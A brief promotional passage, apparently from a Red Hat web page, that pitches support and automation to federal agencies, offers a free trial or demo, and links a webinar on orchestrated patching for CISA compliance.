Backed by Red Hat Support, you have access to knowledge base articles and experts to help you get there because when the federal enterprise is at risk, there is no time for system downtime. Start your free trial today, or schedule a demo to see how powerful a culture of automation can be in your agency.

**Related webinar:**

*   End-to-end orchestrated patching for CISA compliance

Tag

#windows